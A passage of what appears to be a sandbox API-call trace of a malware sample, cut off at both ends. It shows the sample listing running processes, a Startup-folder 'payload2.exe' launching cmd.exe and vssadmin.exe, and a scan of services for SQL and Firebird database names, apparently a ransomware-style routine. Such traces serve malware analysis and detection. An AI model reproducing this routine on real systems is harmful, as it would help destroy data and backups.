(lpString="csrss.exe") returned 9 [0052.015] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.016] lstrlenW (lpString="winlogon.exe") returned 12 [0052.016] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.017] lstrlenW (lpString="services.exe") returned 12 [0052.017] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.017] lstrlenW (lpString="lsass.exe") returned 9 [0052.017] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0052.018] lstrlenW (lpString="lsm.exe") returned 7 [0052.018] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.019] lstrlenW (lpString="svchost.exe") returned 11 [0052.019] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.020] lstrlenW (lpString="svchost.exe") returned 11 [0052.020] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.020] lstrlenW (lpString="svchost.exe") returned 11 [0052.020] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.021] lstrlenW (lpString="svchost.exe") returned 11 [0052.021] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.021] lstrlenW (lpString="svchost.exe") returned 11 [0052.022] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.022] lstrlenW (lpString="audiodg.exe") returned 11 [0052.023] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.023] lstrlenW (lpString="svchost.exe") returned 11 [0052.023] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.024] lstrlenW (lpString="svchost.exe") returned 11 [0052.024] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.025] lstrlenW (lpString="dwm.exe") returned 7 [0052.025] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.025] lstrlenW (lpString="explorer.exe") returned 12 [0052.025] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.026] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.026] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.027] lstrlenW (lpString="taskhost.exe") returned 12 [0052.027] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.027] lstrlenW (lpString="svchost.exe") returned 11 [0052.027] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0052.028] lstrlenW (lpString="taskeng.exe") returned 11 [0052.028] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.029] lstrlenW (lpString="taskhost.exe") returned 12 [0052.029] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0052.029] lstrlenW (lpString="challenging.exe") returned 15 [0052.029] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0052.030] lstrlenW (lpString="pgp prix.exe") returned 12 [0052.030] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0052.030] lstrlenW (lpString="user-reno.exe") returned 13 [0052.030] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0052.031] lstrlenW (lpString="aggregate.exe") returned 13 [0052.031] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0052.032] lstrlenW (lpString="dressed.exe") returned 11 [0052.032] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0052.032] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0052.032] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0052.033] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0052.033] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0052.119] lstrlenW (lpString="developing.exe") returned 14 [0052.119] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0052.120] lstrlenW (lpString="supported.exe") returned 13 [0052.120] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0052.120] lstrlenW (lpString="girlstionselect.exe") returned 19 [0052.120] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0052.121] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0052.121] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0052.122] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0052.122] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0052.122] lstrlenW (lpString="eating.exe") returned 10 [0052.122] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0052.123] lstrlenW (lpString="nh_protected.exe") returned 16 [0052.123] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0052.123] lstrlenW (lpString="vulnerability.exe") returned 17 [0052.123] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0052.124] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0052.124] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0052.125] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0052.125] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0052.125] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0052.125] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0052.126] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0052.126] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.126] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.126] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0052.127] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0052.127] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.128] lstrlenW (lpString="cmd.exe") returned 7 [0052.129] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.129] lstrlenW (lpString="conhost.exe") returned 11 [0052.129] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.130] lstrlenW (lpString="vssadmin.exe") returned 12 [0052.130] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0052.131] lstrlenW (lpString="VSSVC.exe") returned 9 [0052.131] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.131] lstrlenW (lpString="svchost.exe") returned 11 [0052.131] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.132] CloseHandle (hObject=0x200) returned 1 [0052.132] Sleep (dwMilliseconds=0x1f4) [0052.849] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680490 [0052.850] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0052.850] GetLastError () returned 0xea [0052.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0052.850] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0052.851] CloseServiceHandle (hSCObject=0x680490) returned 1 [0052.851] lstrlenW (lpString="Appinfo") returned 7 [0052.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.851] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.851] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.851] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.851] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.851] lstrlenW (lpString="AudioSrv") returned 8 [0052.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0052.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0052.851] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0052.851] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0052.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0052.851] lstrlenW (lpString="BFE") returned 3 [0052.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.851] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.851] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.852] lstrlenW (lpString="CryptSvc") returned 8 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.852] lstrlenW (lpString="CscService") returned 10 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0052.852] lstrlenW (lpString="DcomLaunch") returned 10 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.852] lstrlenW (lpString="Dhcp") returned 4 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.852] lstrlenW (lpString="Dnscache") returned 8 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.852] lstrlenW (lpString="DPS") returned 3 [0052.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0052.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.852] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.852] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.852] lstrlenW (lpString="eventlog") returned 8 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0052.853] lstrlenW (lpString="EventSystem") returned 11 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.853] lstrlenW (lpString="gpsvc") returned 5 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.853] lstrlenW (lpString="iphlpsvc") returned 8 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.853] lstrlenW (lpString="LanmanServer") returned 12 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.853] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.853] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.853] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.853] lstrlenW (lpString="lmhosts") returned 7 [0052.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.854] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.854] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.854] lstrlenW (lpString="MMCSS") returned 5 [0052.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0052.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 